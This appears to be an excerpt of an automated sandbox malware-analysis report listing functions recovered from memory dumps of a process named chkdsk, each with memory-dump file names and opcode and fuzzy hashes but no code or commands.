                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05881796 Relevance: .1, Instructions: 112COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c285ac0995a19f3770eca28167590add95744d14a80143db6743f54d68ce79c0
                                                                                                                    • Instruction ID: 9708bff3e0aec6c650ad148410722cb093b1eebb7305455c0bd752a5eb1eb6b4
                                                                                                                    • Opcode Fuzzy Hash: c285ac0995a19f3770eca28167590add95744d14a80143db6743f54d68ce79c0
                                                                                                                    • Instruction Fuzzy Hash: CD416675A04205EFCB15CF58C485BA9BBF2FB48704F1481AAE805EF345CB34AD41CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05854779 Relevance: .1, Instructions: 111COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bfad896d26de8d1e6a3b7457e171ecf15dde47ca78ffe3b7d3a5a142d7f9c760
                                                                                                                    • Instruction ID: 675bc1459de6b39a4bc2be56597cfaf34bfd12ef5fc3c63119db3f48b5ba71fb
                                                                                                                    • Opcode Fuzzy Hash: bfad896d26de8d1e6a3b7457e171ecf15dde47ca78ffe3b7d3a5a142d7f9c760
                                                                                                                    • Instruction Fuzzy Hash: 0241BF706083418BDB24DF28D899B3ABBEAFF81324F14446DED42C72A0DB30DC85CA91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058601F1 Relevance: .1, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                                                    • Instruction ID: 5d9ab92d3f0d4db0c6d2eb377140936ff103c33e4c6808f6d338b08ca9ed4448
                                                                                                                    • Opcode Fuzzy Hash: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                                                    • Instruction Fuzzy Hash: CA312771604244EFDB12CBA8CC48BEABBAAEF04350F0845A5EC55DB352C6749D84CB69
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05879194 Relevance: .1, Instructions: 105COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: d600997215e3da4ceb0baf470d86a98241558136098bb2df2f2d19b0f28f92d9
                                                                                                                    • Instruction ID: d7fbb07de690311eb3d4372c7c6b87aa98ead6ec6da2e849a8f98b1413978408
                                                                                                                    • Opcode Fuzzy Hash: d600997215e3da4ceb0baf470d86a98241558136098bb2df2f2d19b0f28f92d9
                                                                                                                    • Instruction Fuzzy Hash: D3316F76A1462CAFDB21DB68CC40FAAB7B5AF86720F1501A9ED5CE7240DB30DE448F51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05855622 Relevance: .1, Instructions: 104COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 55d1952c8ab15956e0621066907a132e4b78168a2786f6dad8dba6241338768f
                                                                                                                    • Instruction ID: 1e81bfc3ebe5e95ba6bfa84130207619d9dd08d1be8a6ad10d55b6679a720663
                                                                                                                    • Opcode Fuzzy Hash: 55d1952c8ab15956e0621066907a132e4b78168a2786f6dad8dba6241338768f
                                                                                                                    • Instruction Fuzzy Hash: C1319F31301B46EBDB55EB65C944EAABBAABF44764F404015ED01C7A50EB70EC24CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058766E0 Relevance: .1, Instructions: 102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                                                    • Instruction ID: a8d18ea99adf24b70da4fff532c6749dda93c58f1c351691cafec6acaecc2f11
                                                                                                                    • Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                                                    • Instruction Fuzzy Hash: 7F418F72600A4ADBD732DF18C944EAA77A9FB48B10F404668E856CB6A0DB75DC41DB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05854180 Relevance: .1, Instructions: 102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aef5a69d667e4ee90fff1c4904bca1c09828d784b0018efaa95ba3ad5d78dd74
                                                                                                                    • Instruction ID: 71241e558afd3e3222986b15754e78f07a70ceda414bb9a1f82a28d80b2265d0
                                                                                                                    • Opcode Fuzzy Hash: aef5a69d667e4ee90fff1c4904bca1c09828d784b0018efaa95ba3ad5d78dd74
                                                                                                                    • Instruction Fuzzy Hash: F0417971204B45DFDB22CF28C488FE67BE9BB45714F008829ED5ACB260DBB4AC45CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05875004 Relevance: .1, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                                                    • Instruction ID: e21dc6e8f39c50d2873e628f4e55f60c46be9cb5a251e15fbed427d170964678
                                                                                                                    • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                                                    • Instruction Fuzzy Hash: 7031D23130C3499FE720EA288850B66BBDABB85394F04852AFC86CB391D675DC41C7E2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584B420 Relevance: .1, Instructions: 100COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 573e434eaed5ae4d6155716933fc4a94cc46df0f17c07847ce99dc9d7d612e93
                                                                                                                    • Instruction ID: 6d54570d09787963cde8d5773e1b416bb9f4f25ece24c69327cbd99e7211dfca
                                                                                                                    • Opcode Fuzzy Hash: 573e434eaed5ae4d6155716933fc4a94cc46df0f17c07847ce99dc9d7d612e93
                                                                                                                    • Instruction Fuzzy Hash: 4531E2726042089FCB21DF28C880E6AB7A9FF45325F1546A9ED45CB291DB31ED42CFD0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058CE79D Relevance: .1, Instructions: 100COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b4462e74403e9b2475fefbda045ec5aaefb2dd64a24ab9099a74b6b8f8283dab
                                                                                                                    • Instruction ID: a6c98876ac4b219c13f405ed875efa36cf6105076e080ce80ee61cc5bde63d8a
                                                                                                                    • Opcode Fuzzy Hash: b4462e74403e9b2475fefbda045ec5aaefb2dd64a24ab9099a74b6b8f8283dab
                                                                                                                    • Instruction Fuzzy Hash: 5C319C317496819BE32797AC8989B25BBDCFB41B44F1908E8AD42DB6D2DB38DC40C221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058496E0 Relevance: .1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd45a3cf653d0b5bec61fb398063f90dcd144e729f79eff31c46f859f3fcc3c9
                                                                                                                    • Instruction ID: bdc7eaa9779ce990ff207856c363ecce2ca1eeeea3078646313d2e7101f504cc
                                                                                                                    • Opcode Fuzzy Hash: fd45a3cf653d0b5bec61fb398063f90dcd144e729f79eff31c46f859f3fcc3c9
                                                                                                                    • Instruction Fuzzy Hash: C4218C76A40718ABD731DF688844B2BBBA5EB84B54F124829EE55DB350DA70ED00CF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058506CF Relevance: .1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3fa97f4d631198ed795de34c53c3519b47199b4b31afcae04ca0b726dc3c3c9f
                                                                                                                    • Instruction ID: b70e1ec07d52048b31ab585bb1c308d1b986d69c4edf109a7efc4ba5bd857742
                                                                                                                    • Opcode Fuzzy Hash: 3fa97f4d631198ed795de34c53c3519b47199b4b31afcae04ca0b726dc3c3c9f
                                                                                                                    • Instruction Fuzzy Hash: AD31BF36B05705DBC712DE68888CE6BBBAAAF84760F014929FC15D7211EA31DC058FA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05858470 Relevance: .1, Instructions: 94COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 771d8b026308e060effa6bce5dce30650cff1e09d57e8d8a2083b8b38e41721d
                                                                                                                    • Instruction ID: 5221ab59b292872e2c7b9e3953140095b10fca499f43fbbdf8bc3a72ae2f56e7
                                                                                                                    • Opcode Fuzzy Hash: 771d8b026308e060effa6bce5dce30650cff1e09d57e8d8a2083b8b38e41721d
                                                                                                                    • Instruction Fuzzy Hash: F9319A716093018FE360CF09C814B6AB7E9BB88710F15496EEC89DB390D7B5EC44CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584D64A Relevance: .1, Instructions: 93COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                                                    • Instruction ID: e98b836dcd0f297407a1acb85893787f1b9608f633fa7f6ac9abc4d130e97d2c
                                                                                                                    • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                                                    • Instruction Fuzzy Hash: A1319E7660220CAFDB21CE58C984F6EB3AAEB84758F198429ED0ADB244D774DD40CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588A5E7 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                                                    • Instruction ID: 552b029f8df6b1552d8c4a8cf07b40d82ac93d45ee3aba20c4fbb040c8f77d50
                                                                                                                    • Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                                                    • Instruction Fuzzy Hash: 9D312D72B04B01AFD764DF69CD45B67B7E8FB08A64F04096DA99AC3680E730EC008B54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058556E0 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 786e9ebf2172383d0c708af9a64e7f0145e75dca346acba5bcbe36350c17f2c2
                                                                                                                    • Instruction ID: 59894ac38a0439e446ff8dfbed335975a7e4d8e479836604b74a99c1869ce788
                                                                                                                    • Opcode Fuzzy Hash: 786e9ebf2172383d0c708af9a64e7f0145e75dca346acba5bcbe36350c17f2c2
                                                                                                                    • Instruction Fuzzy Hash: 43318935715A05EFDB55DB24CA88EAABBA6FF88224F505055EC01CBB61DB31EC30CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 059217BC Relevance: .1, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                    • Instruction ID: 2190747becfb07c95cdf6d00bd9f053abdbb16509a35315c3517570d342f296a
                                                                                                                    • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                    • Instruction Fuzzy Hash: DE3181B2E00129EFC714DF69C480AADB7F5FF88311F158169D854DB345D734AA51DBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058FE750 Relevance: .1, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5478ca8474e0a02f3a9cd93a383012c3a229238b9a321fec0761e799f9ae8472
                                                                                                                    • Instruction ID: 87fb841e95824048825c84ab1dbb55df0347ba120cf010878081cc851862adb8
                                                                                                                    • Opcode Fuzzy Hash: 5478ca8474e0a02f3a9cd93a383012c3a229238b9a321fec0761e799f9ae8472
                                                                                                                    • Instruction Fuzzy Hash: 60319EB16183018FCB20EF18D54595ABBF6FF89614F048AAEE989DB221D730DD45CF92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058591E5 Relevance: .1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                                                    • Instruction ID: 987f60b8b8845f4a1a85cc972020d157dce69afce1b1981ab2be36232c9d88ba
                                                                                                                    • Opcode Fuzzy Hash: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                                                    • Instruction Fuzzy Hash: E13188756083499FCB05DF18D84099ABBEAFF89364F05056AFC66D7351D630DC04CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584C0F6 Relevance: .1, Instructions: 88COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0d40d5cd8f8405ffc0215b1ab3f26195fe4411d6efd8b48d2e69ff730560b3b4
                                                                                                                    • Instruction ID: 418f230c7d6c6db1ee8f8ac695217b474cbc20967924434f4a02916abcec4e69
                                                                                                                    • Opcode Fuzzy Hash: 0d40d5cd8f8405ffc0215b1ab3f26195fe4411d6efd8b48d2e69ff730560b3b4
                                                                                                                    • Instruction Fuzzy Hash: 9D31F4B66023008BE720AF28C845B697BB5BF41318F4481A9DD46DF686DE34AD81CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584E3C0 Relevance: .1, Instructions: 88COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b268e710809acffb494f33a9c5b78d840950bf24c81c8937b7b7af388c9f20fb
                                                                                                                    • Instruction ID: 58d73e31715d9f29fbd5e2cbec35dd2d7a0d5f53bcf27066aad8901c1c5940f5
                                                                                                                    • Opcode Fuzzy Hash: b268e710809acffb494f33a9c5b78d840950bf24c81c8937b7b7af388c9f20fb
                                                                                                                    • Instruction Fuzzy Hash: 2531A431A00A1CABDB31DB28CC45FEA77BDBB05754F0100A1EE45E7190D6749E818F92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058844A8 Relevance: .1, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
                                                                                                                    • Instruction ID: 96e12300ba397b0111d7f0167d57e3181b5e4b5ba1154bd015b70bfbaf19b029
                                                                                                                    • Opcode Fuzzy Hash: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
                                                                                                                    • Instruction Fuzzy Hash: 19216276A00705ABCF11DF68C584AAEBBA5FF48324F208079ED05DB255D7B4DE058B90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058843D0 Relevance: .1, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
